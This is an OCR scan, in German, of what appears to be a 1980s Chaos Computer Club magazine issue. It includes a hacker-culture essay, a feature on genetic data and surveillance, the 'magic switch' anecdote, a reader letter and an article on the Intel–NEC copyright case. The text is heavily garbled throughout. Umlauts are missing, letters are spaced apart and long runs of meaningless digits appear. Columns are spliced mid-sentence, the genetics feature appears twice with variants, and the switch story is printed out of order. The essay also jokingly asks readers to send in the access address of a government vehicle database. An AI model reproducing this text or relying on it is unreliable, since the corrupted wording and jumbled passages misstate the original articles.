Die B.H.P. ist so etwas wie das sdliche Gegenstck zum Hamburger "Chaos Computer Club". Bereits 1985 entstand auf Initiative der bayrischen Hacker das "Bayrische Forum Mensch und Computer e.V.". Ein Verein, der sich den Wechselwirkungen zwischen Mensch und Technik widmet. Das Spektrum der Themen reicht von sozialen Folgeabschtzungen des Computereinsatzes bis zur computergerechten Vollwerternhrung. Das Verhltnis zwischen Mensch und Technik war auch das Motiv der B.H.P.-Berichterstattung ber das Reaktorunglck in Tschernobyl. Innerhalb weniger Tage hatte die bayrische Hackerszene einen Informationsdienst mit ersten Meergebnissen, Verhaltenstips, Umrechnungstabellen der verschiedenen Strahlenwerte und Hintergrundberichten aufgebaut. Mittels internationaler Computernetze wurden Korrespondenten angeschrieben und eingehende Meldungen verbreitet. Ein Trumpf, der auch gerne gegen- Von einer ganz anderen Ecke wurde bereits ueber den als computerfeindlich geltenden Ende letzten Jahres die Datensicherheit der Grnen ausqespielt wird. Volkszhlung auf Herz und Nieren geprft. Der Hamburger Informatikprofessor Klaus Brunnstein und seine Mitarbeiterin Marion FischerHbner traten mit 100 000 Spieldaten den
Die D a t e n g c f y l w b e r

03740 46195 85491 60243 51306 93765 46020 S097B 71572 16949 36776 01411 79436 76153 79893 37930 65693 97075 72855 53970 88987 25452 85767 54779 71585 73357 56114 60803 70597 77253 17229 22544 32619 30606

19660 01366 44200 30096 99036 02260 23249 66605 38669 03221 58927 74110 46005 21038 02761 45338 46703 21660 93383 64648 90676 79033 41397 82629 87339 83644 92391 23091 41625 87402 23611 06337 24235 72136

90665 5B543 01457 41270 99860 14929 30023 65118 84224 0025l 63816 91360 35194 72755 76114 18232 78585 69233 49989 17194 50379 72963 35944 61459 74679 75844 51889

13035 66327 47603 48943 66365 10115 0401S 32600 22010 54264 35983 11649 19935 71269 61625 33686 33052 05336 47074 670B3 59036 61626 10237 14427 13975 34235 30994

16501 12549 19302 90397 83232 17177 67723 436B8 24950 94639 12477 95076 60162 92518 49356 12016 75333 98879 16131 48197 69672 58976 44329 36451 71211 55581 63428 03715 63075 79089 25241 26760 72960 61093

79250 63990 21206 17719 27S70 63594 91023 50391 55133 81237 88652 62907 64790 2756B 49590 24373 33793 56513 55012 21448 49499 03949 70935 42861 95613 05002 41393 28496 15017 13729 63077 94420 23541 6470?

66281 62323 56425 51591 37593 31701 04600

33115 60921 34703 56837 10598 97817 03396

> f e

D a t e n S

cfyleuber

Aus fr "Hacker"?
51414 17185 77701 41806 06443 63681 Dieser Essay ergab sich spontan aus einer Diskussion im"Hackerlnfo"-Brett der CLINCH-Mailbox. Hierbei wurden u.a. rechtliche Aspekte der abgelegten Hackerinformationen diskutiert: Nehmen wir also an, ein Freund namens Willy hat erfahren, da das Kraftfahrbundesamt in Flensburg einen Abfragecomputer fr die berchtigte Datenbank (die mit den vielen ) "an das Netz gehngt" hat. Also fragt er seinen schon auf den Netzen erprobten Freund Schorsch, wie man denn vielleicht an die Nua dieses Rechners herankommen knnte. Schorsch als alter Freund legt eine entsprechende Antwort im Brett ab (Nuascanner, "social engineering" usw.), die der Auslser fr obige Diskussion wird. Sind nun Schorschis Informationen als "Beihilfe zu einer Straftat" aufzufassen oder, wie es in der Absicht von Schorsch lag, als einfacher Gedankenund Erfahrungsaustausch zwischen Freunden, Kollegen usw.? Hierbei wurde nun allen "Hackern" ein strflicher Leichtsinn im Umgang mit den Informationen vorgeworfen und nahezu das gesamte Hackerwesen in Frage gestellt. Denn sind Hacker die Leute, die dann tatschlich auf selbstverstndlich verbotene Weise sich Zutritt zu diesen Rechnern verschaffen? Hierbei mu klargestellt werden, was denn ein Hacker nun eigentlich ist. Mancher mag sich unter einem "Hacker" ein Mnnlein mit einer berdimensionalen, blutbefleckten Axt vorstellen, der am Flughafen auf besetzte Terminals wartet um zuzuschlagen; manch anderer ein kaum als Mensch zu identifizierendes Individuum mit langen, fettigen Haaren, glasigen Augen, kaffeebeflecktem Computerpapier unterm Arm und Ringen unter den Augen, wie sie sonst ein frisch gebackener Ehemann nach der Hochzeitsnacht an seiner Angetrauten zu finden hofft. Aber was sind denn Hacker nun? In Deutschland ist "Hacker" der pauschale Oberbegriff fr all das, wofr sich die Amerikaner (jaja, wieder ein typischer Fall der ewigen Ein-Amerikanisierung) jahrelang fein abgegrenzte Begriffe definiert haben . den Hacker, den Phreak, den Cracker und den Crasher. H A C K E R - Der wohl lteste Begriff, gibt es, seit dem es Computer gibt, und zwar nicht nur PC's, sondern auch die alten Kleiderschrnke mit dem Dsenjetsound. Der Autor hat vor 8 Jahren die ersten echten Hacker kennengelernt, im Rechenzentrum einer groen Firma, offiziell als Operateure beschftigt. Jene jvelche hatten eine interne Wette laufen, wer es als erster schafft, das Betriebssystem so zu patchen, da je nach Wochentag bestimmte Meldungen auf der Masterconsole erscheinen wie "Sonntag ist Sabbat please l o g o f f . Dafr wurde auch bis spt in die Nacht "gearbeite". Oder die Geschichte aus den USA, wo auf einem IBM-Kongre ein inoffizieller Wettbewerb lief, wer das unverstndlichste APL- Programm schreiben konnte (gewonnen hat brigens ein Herr, der sein eigenes Programm nicht verstanden, geschweige denn wiedererkannt hatte, nachdem einige Scherzbolde seinen Copyright- Vermerk entfernt hatten). 546^4 19494 23027 40053 31603 77331 22975 59931 40118 06553 33300 46932 4.3174 88683 90115 44031 31483 74414

Der Leser als Kommissar


Hacker waren bzw. sind also User, die so vernarrt in ihre Kiste sind, da sie sich praktisch mit ihr "verheiraten". Der Autor hat seinen ersten Weg zum Hackertum in seiner Schulzeit im zarten Alter von 16 gemacht, als er an dem Schulcomputer (ein alter HPRechner mit 8kByte, I-Zeilen LED-Display) versuchte, eine Folge von BASIC-Befehlen zu einem sinnvollen Programm zu bewegen. Irgendwelche Hintergrundgerusche wurden verdrngt, inklusive dem Schlsselgeklapper des Hausmeisters, als er die Schulrume am Abend verschlo. Nun mute der Autor notgedrungen die Nacht mit dem Rechner verbringen. . . nicht sehr erotisch, aber ergiebig: am naechsten Tag lief das Programm zwar immer noch nicht, aber dafuer konnte man nun auf die Assemblerroutinen (es gab kein Pik oder Poke) zugreifen und das Display blinken oder ganz verschwinden lassen. Dann gings richtig los: tagelang bei "Quelle" vor dem PET200I stehen und "rumpoken", bis die Treiber rauchten, den Pfrtner eines Rechenzentrums nerven usw. Heutzutage ist es einfacher geworden: man kaufe sich eine Datentoilette, einen Komadore und dann kann man sich dutzende verschiedener Grorechner an seinen Schreibtisch holen. Vorbei die Zeit, als man noch zu den Operatorkonsolen schleichen mute, um sich armen Programmierer mehr Privilegien geben zu knnen (und dann mit Futritten oder Bemerkungen wie "geh zurck an deinen TI-59" rausgeworfen zu werden). Heute sind es die Operateure, die verzweifelt den Datex-Hacker bitten, doch bitte auch ihm ein paar Zugriffsrechte zu lassen ("please, give me back my Privileges"). Hacken wird zum Breitensport, zu einer modernen Form der Freizeitbeschftigung, dem "Datenreisen". Die eigentlichen Hacker, die durch ihr Arbeitsverhltnis zwar knnen, aber nicht drfen, werden zu Datenreisenden, die nun anonym ihr Wissenspotential so richtig auskosten knnen. Homecomputerfreunde knnen sich im Rahmen ihrer bescheidenen Mglichkeiten auch Kenntnisse von Grorechnern aneignen. Aber kaum hat dieser neue Sport an Attraktivitt gewonnen, wird er ins kriminelle Abseits gedrngt. Die neuen Hackergesetze aber betreffen nicht nur den Datenreisenden, sondern auch die "alten" Hacker. Eine mit Kaugummi verklebte Lochkarte wird zum Przedenzfall, Mailboxen zu verschwrerischen "Underground- Medien". Und dann wre da ja noch die neue Gebhrenpolitik des Gilb in Bezug auf Datex-P zu nennen, noch viel wirkungsvoller als die neuen Gesetze. Wer kann sich das denn ab April noch leisten? Das Datenreisen, kaum im Kommen, wird sang-und klanglos im N I L verschwinden. Auch fr kommerzielle Mailboxbetreiber brechen harte Zeiten an, denn die Online-Zeiten werden sich verringern und von 10.- D M im Monat kann keiner auf Dauer existieren. Traurig, traurig, die CeBit wird wohl die letzten "Hacksessions" mit sich bringen, denn wenn etwas Geld kostet, dann macht es erfahrungsgem nicht mehr so viel Spa. Es wird Zeil, da auch in unseren Cornflakespackungen kleine Plastikspielzeuge gefunden werden (vielleicht gleich mit FTZ-Nummer?)! brigens: falls einer die Nua der in der Einleitung genannten Datenbank hat (lechz!), mge er sich doch bitte bei uns melden, no pasaran! FR1MP :-)

Feature: Der genetisch glserne Mensch ErbsufcTstanz in der Rasterfahndung


75631 39997 22170 33046 17092 39457 Hamburg (ds) - Als die Kostenexplosion im Gesundheitswesen 1978 ffentliches Thema wurde, betrugen die Gesamtausgaben fr Gesundheit ber 165 Milliarden Mark oder rund 20 Prozent des verfgbaren Einkommens privater Haushalte. "Kostendmpfung" wurde zum gngigen Schlagwort der Diskussion, verbunden mit kontroversen Auseinandersetzungen ber Ausgestaltung und Konsequenzen des beabsichtigten Sparkurses. Wesentliche Voraussetzung der angepeilten Steuerungsversuche war die "Verbesserung der Datenlage", heit, die Kassen, die sich zudem mit einem wachsenden Anteil an chronischen, sozial- und umweltbedingten Krankheiten konfrontiert sahen, konstatierten einen wesentlich erhhten Bedarf an Sozial- und Gesundheitsdaten. Geplant wurde ein maschinenlesbarer Versichertenausweis der mit ebenfalls maschinenlesbaren Formularen gekoppelt werden sollte. Ein neu einzufhrender Paragraph 319 der Reichsversicherungsordnung (RVO), sollte die rechtlichen Grundlagen dieses sogenannten "Transparenzprojektes" schaffen. Nach einer Felderprobung in Schleswig-Holstein wurde das Vorhaben jedoch zunchst verworfen. Allerdings nichl aus datenschutzrechtlichen, sondern vor allem wegen konomischer Bedenken. Kosten-Nutzen-Rechnungen mit Daten ber Erbgut? 90962 71662 26074 07187 49975 35921 Der dahinterstehende Wunsch nach detaillierten Informationssystemen ist damit aber nicht vom Tisch. Im Gegenteil! Dem Kassenarzt werden unter Berufung auf Paragraph 368 RVO bereits ber 80 vorgedruckte Bescheinigungen und detaillerte Berichte ber seine Patienten abverlangt, was im Einzelfall bedeuten kann, da der Patient vor der Alternative steht, entweder auf die Wahrung seiner Intimdaten oder auf wirksame Hilfe zu verzichten. Die Forderung nach mehr Effektivitt und Effizienz hat auch im Gesundheitswesen zunehmend KostenNutzen- Rechnungen aufkommen lassen. Der Prventivmedizin wurde wachsende Bedeutung beigemessen. Der steigende Anteil umweltbedinger Krankheiten hat zudem eine neue medizinische Disziplin auf den Plan gerufen, die sogenannte kogenetik. Sie untersucht Wechselwirkungen zwischen Erbe und Umwelt, insbesondere Wirkungen potentiell erbgutverndernder Stoffe auf die genetische Konstitution des Menschen. Anllich eines vom Forschungsministerium initiierten Fachgesprchs im Herbst 1983, vertraten die Hamburger Humangenetiker Prof. Werner Gdde und Prof. Dharam Agarwal die Auffassung, da die Erfassung der genetischen Konstitution generell immer wichtiger erscheine. Sie empfahlen einen sogenannten PharmakogenetikPass, der, nach dem Prinzip der Unfallschutzkarten, dem behandelnden Arzt Anhaltspunkte ber individuelle Anflligkeiten oder Resistenzen gegenber bestimmten Substanzgruppen geben soll. 27560 84 414 73 78: 33032 70330 16823 71936 48802 17328 57349 35947 56433 41299 43024 85023. 57322 1 4597 34328 264 14 21 654 87372 67.33 67010 61509

Gen-j^^se^ffentJicherjGesundheitsvorsorge 42434 56984 40187 33129 " 10107 94512 Allgemein stellt sich die Frage, wer in welchem Umfang Daten der ffentlichen Gesundheitsfrsorge oder kassenrztlichen Abrechnung erheben und offenbaren darf. Wer, zu welchen Zweck Zugriff bekommt - und. unabhngig von solchen formalen Kriterien, welche Schlussfolgerungen aus dem Datenmaterial von wem zu welchem Zweck gezogen werden. Kritiker versichern, dass beispielsweise in der Hamburger Gesundheitsbehrde und dem Tumorzentrum in Hamburg Eppendorf eine Behindertenkartei gefhrt werde, in der ca. 2000 Menschen erfasst sind. Erkennbare Fehlbildungen bei der Geburt werden automatisch beim Statistischen Bundesamt in Wiesbaden ausgewertet. Aus anderen Unterlagen gehe hervor, da in Europa alle Mibildungen nach einheitlichen Kriterien erfasst werden sollen. Nach Auffassung von Prof. Dr. Bernd Klees, werde eine umfassende pr- und postnatale genetische Analyse in naher Zukunft die Grundlage individueller Gen-Karten und zentralisierter Genkarteien liefern, die die Mehrzahl unserer Bevlkerung einer totalen Kontrolle unterwerfen werde. "Das Konstrukt der 'informationellen Selbstbestimmung'", so Klees, "wird dann nur noch eine hilflose Verteidigungslinie sein. Die 'Volksshlungsdebatte' wre gegen ber den 'Gen- Debatte' nur ein gleichsam harmloses Prlud i u m " . Die bayrischen Vorste zur AIDS- Meldepflicht, geben einen Vorgeschmack auf knftige Entwicklungen. Gen-Analyse im Arbeitsleben 72237 37886 12605 81656 6OT73 71439 Auch wenn dieser Vorschlag zunchst auf verhaltenen Beifall stie, im Rahmen berufsgenosscnschaftlicher Untersuchungen wird die genetische Analyse durch Betriebsrzte zunehmend zur Alltagsroutine werden. Nach Auffassung von Dr. Breitstadt, Werksarzt der Firma Hchst, wre anbetracht der speziellen Arbeitsplatzrisiken im Sinne des derzeitigen berufsgenossenschaftlichen Regelwerkes eine Duldungspflicht genetischer Untersuchungen anzustreben. Ein grundstzliches Recht des Arbeitgebers, vor Einstellung rztliche Untersuchungen zu verlangen, wird nach derzeitiger Rechtslage nicht bestritten - zumindest nicht wenn es darum geht, Arbeitsplatzrisiken zu erkennen. Zu erwarten ist, dass in Parallelitt zum psychologischen in Krze auch genetische Eignungstests eingefhrt werden. Auf dieser Grundlage werden Arbeitsgerichte in erster Linie ber Grenzen der Zumutbarkeit zu befinden haben. Betont wird, dass genetische Untersuchungen im Arbeitsleben grundstzlich auf Freiwilligkeit der zu Untersuchenden beruhen sollte. Alternativen gesucht 61278 33732 52737 33903 T2890 50686 In einem Schreiben an den Vorsitzenden der Enquete-Kommission Gentechnik hat die Bundesvereinigung der Huntington-Gruppen in der Bundesrepublik bereits im Februar darauf bestanden, da ausschlielich der Patient die Daten seiner genomanalytischen Untersuchung verwahren bzw. verwenden 53241 38062 79602 59303 37727 69778 37923 68409 325.36 58807 33983 4572 1 37460 : i 0 5 31148 33513 23850 04782 71693 76213 00490 47955 97959 29059

2>ie

>aten

ewber

S>te

<X>atencjtew&er

Feature: Der genetisch g l s e r n e M e n s c h Erbsubstanz in der R a s t e r f a h n d u n g


75631 39997 22170 33046 17092 39457 Hamburg (ds) - Als die Kostcnexplosion im Gesundheitswesen 1978 ffentliches Thema wurde, betrugen die Gesamtausgaben Tr Gesundheit Uber 165 Milliarden Mark oder rund 20 Prozent des verfgbaren Einkommens privater Haushalte. "Kostendmpfung" wurde zum gngigen Schlagwort der Diskussion, verbunden mit kontroversen Auseinandersetzungen ber Ausgestaltung und Konsequenzen des beabsichtigten Sparkurses. Wesentliche Voraussetzung der angepeilten Steuerungsversuche war die "Verbesserung der Datenlage", heit, die Kassen, die sich zudem mit einem wachsenden Anteil an chronischen, sozial- und umweltbedingten Krankheiten konfrontiert sahen, konstatierten einen wesentlich erhhten Bedarf an Sozial- und Gesundheitsdalen. Geplant'wurde ein maschinenlesbarer Versichertenausweis der mit ebenfalls maschinenlesbaren Formularen gekoppelt werden sollte. Ein neu einzufhrender Paragraph 319 der Reichsversicherungsordnung (RVO), sollte die rechtlichen Grundlagen dieses sogenannten "Transparenzprojektes" schaffen. Nach einer Felderprobung in Schleswig-Holstein wurde das Vorhaben jedoch zunchst verworfen. Allerdings nicht aus datenschutzrechtlichen, sondern vor allem wegen konomischer Bedenken. Kosten-Nutzen-Rech n ungen m}t_Djnen ber Erbgut'.' 90962 71662 26074 1 7 1 3 7 49975 35921 Der dahinter stehende Wunsch nach detaillierten Informationssystemen ist damit aber nicht vom Tisch. Im Gegenteil! Dem Kassenarzt werden unter Berufung auf Paragraph 368 RVO bereits ber 80 vorgedruckte Bescheinigungen und detaillerte Berichte ber seine Patienten abverlangt, was im Einzelfall bedeuten kann, da der Patient vor der Alternative steht, entweder auf die Wahrung seiner Intimdaten oder auf wirksame Hilfe zu verzichten. Die Forderung nach mehr Effektivitt und Effizienz hat auch im Gesundheitswesen zunehmend KostenNutzen- Rechnungen aufkommen lassen. Der Prventivmedizin wurde wachsende Bedeutung beigemessen. Der steigende Anteil umwelthedinger Krankheiten hat zudem eine neue medizinische Disziplin auf den Plan gerufen, die sogenannte kogeneIik. Sie untersucht Wechselwirkungen zwischen Erbe und Umwelt, insbesondere Wirkungen potentiell erbgutverndernder Stoffe auf die genetische Konstitution des Menschen. Anllich eines vom Forschungsministerium initiierten Fachgesprchs im Herbst 198.1, vertraten die Hamburger Humangenetiker Prof, Werner Godde und Prof. Dharam Agarwal die Auffassung. daB die Erfassung der genetischen Konstitution generell immer wichtiger erscheine. Sie empfahlen einen sogenannten PharmakogenetikPass. der, nach dem Prinzip der Unfallschutzkarten, dem behandelnden Arzt Anhaltspunkte ber individuelle Anflligkeiten oder Resistenzen gegenber bestimmten Substanzgruppen geben soll. 27560 344J 4 7j732 33032 700 3a 10023 71936 43002 7323 57349 35947 56433 429? 43024 95023 57322 14597 3432S 26414 216* 37572 6733 78X0 509

Gen-Analyse ffentlicher Gesundheitsvorsorec 42434 56984 40187 33 128 10107 9451 2" Allgemein stellt sich die Frage, wer in welchem Umfang Daten der ffentlichen Gesundheitsfrsorge oder kassenrztlichen Abrechnung erheben und offenbaren darf. Wer, zu welchen Zweck ZugriTf bekommt - und, unabhngig von solchen formalen Kriterien, welche Schlussfolgerungen aus dem Datenmaterial von wem zu welchem Zweck gezogen werden. Kritiker versichern, dass beispielsweise in der Hamburger Gesundheitsbehrde und dem Tumorzentrum in Hamburg Eppendorf eine Behindertenkartei gerhrt werde, in der ca. 2000 Menschen erfasst sind. Erkennbare Fehlbildungen bei der Geburt werden automatisch beim Statistischen Bundesamt in Wiesbaden ausgewertet. Aus anderen Unterlagen gehe hervor, da in Europa alle Mibildungen nach einheitlichen Kriterien erfasst werden sollen. Nach Auffassung von Prof Dr. Bernd Klees, werde eine umfassende pr- und postnatale genetische Analyse in naher Zukunft die Grundlage individueller Gen-Karten und zentralisierter Genkarteien liefern, die die Mehrzahl unserer Bevlkerung einer totalen Kontrolle unterwerfen werde. "Das Konstrukt der 'informationellen Selbstbestimmung - ", so Klees, "wird dann nur noch eine hilflose Verteidigungslinie sein. Die'Volksshlungsdebatte' wre gegen ber den 'Gen- Debatte' nur ein gleichsam harmloses Prlud i u m " . Die bayrischen Vorste zur AIDS- Meldepflicht, geben einen Vorgeschmack auf knftige Entwicklungen. Gen-Analyse im Arbeitslcben 72237 37336 1 2605 8 1656 63K3 71439 Auch wenn dieser Vorschlag zunchst aul verhaltenen Beifall stie, im Rahmen berufsgenossenschaftlicher Untersuchungen wird die genetische Analyse durch Betriebsrzte zunehmend zur Alltagsroutine werden. Nach Auffassung von Dr. Breitstadt. Werksarzi der Firma Hchst, wre anbetrachl der speziellen Arbeitsplatzrisiken im Sinne des derzeitigen berufsgenossenschaftlichen Regelwerkes eine Duldungspflicht genetischer Untersuchungen anzustreben. Ein grundsatzliches Recht des Arbeitgebers vor Einstell ung rztliche Untersuchungen zu verlangen, wird nach derzeitiger Rechtslage nicht bestritten - zumindest nicht wenn es darum geht, Arbeitsplatzrisiken zu erkennen. Zu erwarten ist. dass in Parallelitt zum psychologischen in Krze auch genetische Eignungstests eingefhrt werden. Auf dieser Grundlage werden Arbeitsgerichte in erster Linie ber Grenzen der Zumutbarkeit zu befinden haben. Betont wird, dass genetische Untersuchungen im Arbeitsleben grundstzlich auf Freiwilligkeit der zu Untersuchenden beruhen sollte. Alternativen gesucht 61278 83732 52737 33903 T2390 50686 In einem Schreiben an den Vorsitzenden der Enquete-Kommission Gentechnik hat die Bundesvereinigung der Huntington-Gruppen in der Bundesrepublik bereits im Februar daraufbestanden, da ausschlielich der Patient die Daten seiner genomanalytischen Untersuchung verwahren bzw. verwenden 53241 33052 79602 59303 37727 69778 37923 68409 32536 53807 33983 45721 37460 ; j 8 i 5 J X ! 4 8 35513 23350 04782 '693 7623 00490 47955 97959 29059

Der magische Schalter


aus: F O R T H T R E E Hamburg d e n S c h a l t e r doppelt nutzlos: er w a r nicht nur elektrisch i n o p e r a b e l , s o n d e r n a u c h noch verb u n d e n mit e i n e m Teil, d a s niemals i r g e n d w i e o d e r i r g e n d w a s b e w i r k e n w r d e . Also l e g t e n wir d e n Schalter um. D e r C o m p u t e r strzte augenblicklich ab. D i e s m a l g i n g e n wir z u R i c h a r d G r e e n b l a t t , einem altgedienten MITH a c k e r , der g r a d e d a w a r . A u c h ihm w a r d e r S c h a l t e r nie z u v o r a u f g e f a l l e n . Er inspizierte ihn, k a m zu d e m S c h l u , d a e r nutzlos ist, b r a c h t e e i n e n S e i t e n s c h n e i d e r und m a c h t e ihn raus. A n s c h l i e e n d f u h r e n wir d e n R e c h n e r h o c h und alles lief w i e g e s c h m i e r t . W i r w i s s e n i m m e r noch nicht, w i e d e r S c h a l t e r die M a s c h i n e z u m A b s t u r z b r a c h t e . Es gibt e i n e T h e o r i e , d a ein v e r n a c h l s s i g b a r kleiner S t r o m an d e m g r o u n d pin herrscht und d a s U m l e g e n d e s S c h a l t e r s die elektrische Leistung g e n g e n d v e r n d e r t , um d e n S t r o m s o w e i t z u beeintrchtigen, da MillionstelsekundenP u l s e d u r c h l a u f e n . A b e r wir sind nicht sicher. Alles w a s wir s a g e n k n n e n ist, d a d e r S c h a l ter m a g i s c h w a r . Ich h a b e d e n S c h a l t e r i m m e r noch bei mir z u H a u s e . Vielleicht bin ich verrckt, a b e r ich h a b e ihn g e w h n l i c h auf " m o t e magic" gekippt. b e r s e t z u n g ins D e u t s c h e von P e t e r G l a s e r . 77751 37158 22S67 43953 93299 34535 97540 0 1 529
2696

V o r ein p a a r J a h r e n schnffelte ich in d e n Vitrinen, in d e n e n die P D P - 1 0 d e s M I T Artificial Intelligence Lab' u n t e r g e b r a c h t w a r , und ich b e m e r k t e e i n e n k l e i n e n S c h a l t e r , der a n d e n R a h m e n einer der Vitrinen geklebt w a r . E s w a r offensichtlich ein in H e i m a r b e i t z u s a m m e n g e basteltes Ding, d a s einer d e r H a r d w a r e H a c k e r d e s Labors (keiner w u t e , w e r ) a n g e b r a c h t hatte. M a n f a t keinen u n b e k a n n t e n Schalter a n einem Computer an ohne zu wissen, was passiert, d e n n m a n knnte e i n e n Absturz herbeifhren. D e r S c h a l t e r w a r auf hchst unh ilfreiche W e i s e beschriftet. E s g a b z w e i S t e l l u n g e n , und mit Bleistift w a r auf d a s M e t a l l d e s S c h a l t e r s gekritzelt "magic" u n d "more magic". Der S c h a l ter w a r auf "more magic" gekippt. Ich bat e i n e n a n d e r e n H a c k e r , sich d a s a n z u s e h e n . A u c h er h a t t e d e n S c h a l t e r noch nie g e s e h e n . E i n e g e n a u e r e U n t e r s u c h u n g e r g a b , d a blo E I N Draht zu d e m Schalterfhrte! Das andere E n d e d e s Drahts v e r s c h w a n d in der Leitungswirrnis im I n n e r e n d e s C o m p u t e r s , a b e r es ist e i n e g r u n d l e g e n d e T a t s a c h e v o n Elektrizitt, d a ein S c h a l t e r nichts bewirkt, so l a n g e nicht Z W E I D r h t e an ihm a n g e s c h l o s s e n sind. D i e s e r S c h a l t e r hatte e i n e n Draht, d e r a n der e i n e n S e i t e a n g e s c h l o s s e n w a r , und k e i n e n D r a h t a n d e r a n d e r e n Seite. E s w a r klar, d a d i e s e r S c h a l t e r i r g e n d j e m a n d e s Vorstellung v o n e i n e m billigen Witz e n t s p r u n g e n w a r . Bestrkt in u n s e r e r b e r z e u g u n g , d a der S c h a l t e r u n w i r k s a m w a r , legten w i r i h n u m . D e r C o m p u t e r strzte augenblicklich ab. M a n stelle sich u n s e r v o l l k o m m e n e s E r s t a u n e n vor. W i r v e r b u c h t e n es als Zufall, kippten a b e r nichtsdestotrotz d e n S c h a l t e r auf die "more magic"-Position, b e v o r wir d e n C o m p u t e r w i e der h o c h f u h r e n . Ein J a h r s p t e r e r z h l t e ich die G e s c h i c h t e e i n e m a n d e r e n H a c k e r - D a v i d M o o n , w e n n ich mich recht e r i n n e r e . Er z w e i f e l t e natrlich a n m e i n e m V e r s t a n d o d e r n a h m a n , ich w r d e a n e i n e b e r n a t r l i c h e M a c h t in d i e s e m S c h a l t e r g l a u b e n , b e z i e h u n g s w e i s e e r d a c h t e , ich f o p p e ihn mit e i n e m M r c h e n . U m ihn z u b e r z e u g e n , z e i g t e ich ihm d e n S c h a l t e r , d e r i m m e r n o c h a n d e r s e l b e n Stelle a n g e k l e b t w a r , mit b l o e i n e m D r a h t , d e r z u ihm fhrte. Er w a r i m m e r n o c h in d e r "more m a g i c " - S t e l l u n g . W i r p r f t e n d e n Schalter und seine e i n s a m e Verbindung und f a n d e n , d a d a s a n d e r e E n d e d e s D r a h t s , fest

94213 72772 16619 62106 20836 -53209 25038

11253 80572 49332 0549B

34360 52661 91845 25704

Laserbriefe
A n die Redaktion "Bratenschleuder" C h a o s Computer Club Sehr geehrte Redaktion "Bratenschleuder", Hiermit b e s t e l l e ich d a s P r o g r a m m p a k e t l r d e n C 6 4 zu 2.50 DM. D a s P r o g r a m m p a k e t enthlt:

Tomatomat Plus
1-2-Dry

Tea Base I 2,50 DM liegen in Briefmarken bei. PS.: Bin begeisterter Computer-Freak!

verbunden mit der Computerverdrahtung, mit einem ground pin verbunden war. Das machte

>atencf)leuber

>aten

cfyteuber

Neue Runde im Prozessorkrieg


Ende Septmeber letzten Jahres feierte Silicon Valley einen groen Sieg. I n dem Copyright-Proze zwischen Intel und N E C mit Intel als Klger hatte Richter W i l l i a m A. Ingram vom District Court in San Jose endlich ein Urteil gefllt. Er erklrte, wie Intel beantragt hatte, den Microcode von Microprozessoren als Software. Damit fiel er unter das amerikanische Copyright. Alle Intel-Prozessoren der acht-, sechzehnund zweiunddreiig-Bit-Klasse, weltbekannt unter den Zifferncodes 8088,8086,80186, 80286 und 80386, drfen laut Ingrams Spruch nicht derart nachempfunden werden, da sie mit den Intel-Produkten kompatibel sind. Damit erklrte der Richter die als V-Serie eingefhrten Eigenentwicklungen von N E C zu Makulatur, zumindest fr amerikanisches Territorium. " A l l e knftigen Produkte mit einem Microcode drfen nicht kopiert werden", so machte Intel-Anwalt F. Thomas Dunlap die Tragweite des Urteils deutlich. Die Japaner, reich an Speichern, arm an Logik, zogen daraus Schlufolgerungen, wie sie ihrem flexiblen Wesen entsprechen: Sie fragten nach Lizenzen an. Doch was im Zuge der Verkaufswelle fr die I6-BitCPU's noch mglich war, ist i m anlaufenden 32-BitGeschfl ein Tabu. War Hitachi noch vor Motorola Fujitsu wie auch Mitsubishi und O k i Electric noch von Intel grozgig mit Second-Source- Lizenzen fr den K a m p f um die Ausbreitung der beiden amerikanischen 16-Bit-Welten bedacht worden, so ist der Lizenzladen fr die Mchtigen - vorerst - geschlossen. Hier haben M o t o r o l a einen Markanteil von 57 Prozent, und Intel bereits 30 Prozent zu verteidigen. Die Prozessoren selber generieren zwar nur relativ geringen Umsatz. So kostet die frisch auf den Markt geworfene 32-Bit C PU 80386 von Intel derzeit um die 400 D o l l a r , drfte aber bald in hheren Stckzahlen a u f 2 5 0 , und in f n f Jahren auf 25 Dollarfallen. Doch nicht der Prozessor selber ist das entscheidende Geschft, sondern die Halbleiterperipherie, die er kreiert. M i t ihr mu er sich verstehen, und so mten sich auch Fremdarbeiter an die Spielregeln eines Produktes halten, a u f das sie keinen Einflu haben. Die Japaner lieen sich von Richter Ingram nicht ins Bockshorn jagen. H i t a c h i und Fujisu beschlossen Ende O k t o b e r letzten Jahres kurzerhand, selber in dieses mhsame Geschft einzusteigen. Nicht wegen der Technologie ist die Prozessor-Produktion so vertrackt. Die Missionsarbeit fr das passende Betriebssystem macht wegen ihres ungewissen Ausgangs das Prozessorgeschft so risikoreich. Dabei sind die Voraussetzungen f r einen 32-Bit-Prozessor in Japan nahezu ideal. Die Insel - gilt mit rund vier M i l l i o n e n Installation - als ein Workstation-Wunderland, in dem unweigerlich M o t o r o l a und Intel den T o n angeben wrden. Der M a r k t wre also vorhanden. N u r bei dem Betriebssystem, das der neue T y p des Joint- Ventures untersttzen soll, herrscht noch Unklarheit. Von einer Unix-Schnittstelle ist die Rede, aber auch von T R O N (The Real-Time Operating System Nucleus), das als ' r e v o l u t i o n r ' gepriesen w i r d und besonders a u f japanische Bedrfnisse (Mehrsprachenverabeitung) zugeschnitten sein soll. A u c h die technischen G r u n d d a t e n werden bereits gehandelt: 700000 Transistoren. 128-KB-Stack-Cache, l - K B - InstructionsCache, 16 Register und 64 M B Hauptspeicher. A l l e r d i n g s geisterte im Gefolge des Prozesses zwischen N E C und Intel auch schon ein 32-Bit Microprozessor als O r i g i n a l e n t w i c k l u n g von N E C . Nach

seiner technischen Beschreibung wre er unschlagbar gewesen. Aber Hitchi und Fujitsu scheinen der Realitt nher zu sein. Wenn Fujitsu sich zu 80 Prozent bei Fairchild einkaufen darf, ist ein ausgereifter 32-BitProzessor in diesem Halbleiter- Einkaufskorb enthalten. a. nony
C P U K R I 1 9 . D O C 19870326 I M 0

